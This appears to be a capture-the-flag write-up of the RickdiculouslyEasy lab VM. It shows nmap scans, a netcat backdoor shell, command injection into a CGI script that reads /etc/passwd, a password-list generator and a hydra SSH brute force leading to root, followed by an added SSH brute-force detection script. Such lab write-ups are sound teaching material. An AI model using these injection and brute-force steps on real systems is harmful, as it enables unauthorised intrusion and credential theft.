I used Ubuntu server 18.04 as a base for my VM guest OS. I SSHed from the host OS to Ubuntu server VM; from here I tried to break into RickdiculouslyEasy VM.

It would be more convenient to attack the vulnerable VM directly from the host OS, but going through an intermediate VM seems safer. I could create checkpoints to roll back if necessary. My data on the host was separate from the vulnerable VM, which might corrupt it. You can never be too careful.


RickdiculouslyEasy VM IP was I could do a ping sweep over host addresses to find the IPs of all local VMs

nmap -v -sn


Ran nmap against to find all open ports.

# T4: faster scan; T5 is too aggressive
# -Pn: skip host discovery, treats all hosts as live
# -p-: all ports
# -sV: find which services are currently running on found open ports
$ sudo nmap -T4 -v -Pn -p- -sV

21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http    Cockpit web service
13337/tcp open  unknown
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown


nmap -sC showed that ftp can be signed in to without a password. Inside, I got the 1st flag FLAG{Whoa this is unexpected} - 10 Points

cockpit gave FLAG {There is no Zeus, in your face!} - 10 Points. The login page was broken so there was nothing else to do here.

nc gave FLAG:{TheyFoundMyBackDoorMorty}-10Points. provided a hint that it’s a shell. Used nc to connect and there was a flag file inside FLAG{Flip the pickle Morty!} - 10 Points.

:80 was just a normal page. gave links to 3 other webpages. The most important link among them is A quick test showed that Linux commands can be injected into the cgi script.; ls -al lists all files in the current dir.

Trying some ls -al, cd and pwd led me to another flag file. FLAG{Yeah d- just don't do it.} - 10 Points

I also found passwords.html, which hid the password winter in the HTML comments.; ls -al /etc; more /etc/passwd gave the list of all users.


Port 22 seemed like a fake ssh port while port 22222 is the actual ssh port.

Tried the winter password with all found users and it was Summer’s. Inside Summer’s home dir, I got another flag. FLAG{Get off the high road Summer!} - 10 Points

Accessed /home/Morty, there were 2 files, an image and a password-protected zip file. Opening the image with vim, I saw the zip password Meeseek. unzip -c journal.txt.zip gave FLAG: {131333} - 20 Points

Inside /home/RickSanchez, there is a binary file safe which can be read by all but only executed by RickSanchez. cp safe /home/Summer/ copied the file and the new file is owned by Summer.

$ ./safe 131333
decrypt: 	FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.

brute force

I created a bash file to generate all possible passwords:


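# Candidate format from the hints: 1 uppercase letter, 1 digit, 1 word from the band name
band=("The" "Flesh" "Curtains")

for i in {A..Z}; do
    for j in {0..9}; do
        for k in "${band[@]}"; do
            password="$i$j$k"
            echo "$password" >> rickpass.txt
        done
    done
done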

Then I used hydra to brute force RickSanchez’s password:

hydra -l RickSanchez -P rickpass.txt ssh://

The password was P7Curtains.
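A defender's view of the hydra run above, as an added example that is not part of the original write-up: a shell function that counts failed SSH password attempts per source and user in sshd auth-log lines and marks the pairs where a login then succeeded. The log lines, addresses, host name and threshold are constructed for illustration.

```shell
#!/bin/sh
# Constructed sshd auth-log sample (not captured from the VM).
# 203.0.113.5 and 198.51.100.7 are documentation addresses.
sample_log() {
cat <<'EOF'
Jan 10 10:00:01 vm sshd[1201]: Failed password for RickSanchez from 203.0.113.5 port 40110 ssh2
Jan 10 10:00:02 vm sshd[1203]: Failed password for RickSanchez from 203.0.113.5 port 40112 ssh2
Jan 10 10:00:03 vm sshd[1205]: Failed password for RickSanchez from 203.0.113.5 port 40114 ssh2
Jan 10 10:00:04 vm sshd[1207]: Failed password for RickSanchez from 203.0.113.5 port 40116 ssh2
Jan 10 10:00:05 vm sshd[1209]: Failed password for RickSanchez from 203.0.113.5 port 40118 ssh2
Jan 10 10:00:06 vm sshd[1211]: Failed password for RickSanchez from 203.0.113.5 port 40120 ssh2
Jan 10 10:00:07 vm sshd[1213]: Accepted password for RickSanchez from 203.0.113.5 port 40122 ssh2
Jan 10 11:30:00 vm sshd[1300]: Failed password for invalid user admin from 198.51.100.7 port 51000 ssh2
Jan 10 11:31:00 vm sshd[1302]: Accepted password for Summer from 198.51.100.7 port 51002 ssh2
EOF
}

# detect_bruteforce MIN
# Reads sshd log lines on stdin and prints "source user failures status"
# for every (source, user) pair with at least MIN failed password attempts.
detect_bruteforce() {
    awk -v min="$1" '
    /sshd\[[0-9]+\]: (Failed|Accepted) password for / {
        # The user is the field before the last "from", the source the field after it.
        for (i = 1; i <= NF; i++)
            if ($i == "from") { user = $(i - 1); src = $(i + 1) }
        key = src " " user
        if ($0 ~ /: Failed password/)
            fails[key]++
        else if ((key in fails) && fails[key] >= min)
            hit[key] = 1    # accepted login after a burst of failures
    }
    END {
        for (k in fails)
            if (fails[k] >= min)
                print k, fails[k], ((k in hit) ? "SUCCESS_AFTER_FAILURES" : "failed_only")
    }' | sort
}

# Report pairs with 5 or more failures in the constructed sample.
sample_log | detect_bruteforce 5
```

A pair marked SUCCESS_AFTER_FAILURES is the one to triage first, since it indicates a guessed password rather than just noise.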

Used sudo -i to go to the /root dir and got the last flag. FLAG: {Ionic Defibrillator} - 30 points